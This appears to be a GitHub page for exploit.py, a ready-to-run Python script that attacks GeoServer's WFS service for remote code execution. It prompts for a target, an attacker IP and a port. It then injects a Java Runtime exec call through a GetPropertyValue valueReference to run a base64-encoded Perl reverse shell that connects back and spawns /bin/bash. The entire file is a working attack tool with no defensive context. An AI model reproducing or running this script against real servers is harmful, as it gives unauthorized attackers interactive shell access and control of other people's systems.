-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathexploit.py
107 lines (90 loc) · 3.77 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import xml.etree.ElementTree as ET
import base64
# Disable SSL warnings
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# Request host input from the user
host = input("Enter host (e.g., https://example.com/): ").strip()
LHOST = input("Enter IP: ").strip()
LPORT = input("Enter Listing Port: ").strip()
# Create the full URL for the first request (GET)
endpoint = "/geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0"
full_url = f"{host}{endpoint}"
# HTTP headers for the GET request
headers = {
"User-Agent": "python-requests/2.31.0",
"Accept-Encoding": "gzip, deflate, br",
"Accept": "*/*",
"Connection": "keep-alive"
}
# Perform the GET request, bypassing SSL
try:
response = requests.get(full_url, headers=headers, verify=False)
response.raise_for_status() # Ensure HTTP status 2xx
# Parse XML response
try:
xml_response = response.text
root = ET.fromstring(xml_response)
except ET.ParseError:
print("Error: Response is not valid XML.")
exit(1)
# Define the namespace for XML elements
namespaces = {
'wfs': 'http://www.opengis.net/wfs/2.0'
}
# Extract the <wfs:ReturnFeatureType> element
features = root.findall('.//wfs:ReturnFeatureType', namespaces)
if features:
print("Feature Type:")
# Display the first feature
selected_feature = features[0].text
print(selected_feature)
else:
print("No Feature Type found.")
exit(1)
# Construct the Perl script for reverse shell
perl_script = (
f'perl -e \'use Socket;$i="{LHOST}";$p={LPORT};'
'socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));'
"if(connect(S,sockaddr_in($p,inet_aton($i)))){"
'open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");'
'exec("/bin/bash -i");};\'' # Change this shell to /bin/bash or /bin/sh if there are problems
)
# Base64 encode the Perl script
base64_payload = base64.b64encode(perl_script.encode()).decode()
# Bash command to execute the payload
bash_command = f"sh -c echo${{IFS}}{base64_payload}|base64${{IFS}}-d|sh"
# Construct the XML body for the POST request
post_body = f"""
<wfs:GetPropertyValue service='WFS' version='2.0.0'
xmlns:topp='http://www.openplans.org/topp'
xmlns:fes='http://www.opengis.net/fes/2.0'
xmlns:wfs='http://www.opengis.net/wfs/2.0'>
<wfs:Query typeNames='{selected_feature}'/>
<wfs:valueReference>exec(java.lang.Runtime.getRuntime(), "{bash_command}")</wfs:valueReference>
</wfs:GetPropertyValue>
"""
# Create the full URL for the POST request
post_url = f"{host.rstrip('/')}/geoserver/wfs"
# HTTP headers for the POST request
post_headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
"Accept-Encoding": "gzip, deflate, br",
"Accept": "*/*",
"Connection": "keep-alive",
"Content-Type": "application/xml",
"Content-Length": str(len(post_body)) # Set content length
}
# Perform the POST request with the XML body
try:
post_response = requests.post(post_url, data=post_body, headers=post_headers, verify=False)
post_response.raise_for_status() # Ensure HTTP status 2xx
# Display the response from the POST request
print("\nResponse Status (POST):", post_response.status_code)
print("Response Body (POST):")
print(post_response.text)
except requests.exceptions.RequestException as e:
print(f"Error while making POST request: {e}")
except requests.exceptions.RequestException as e:
print(f"Error while making GET request: {e}")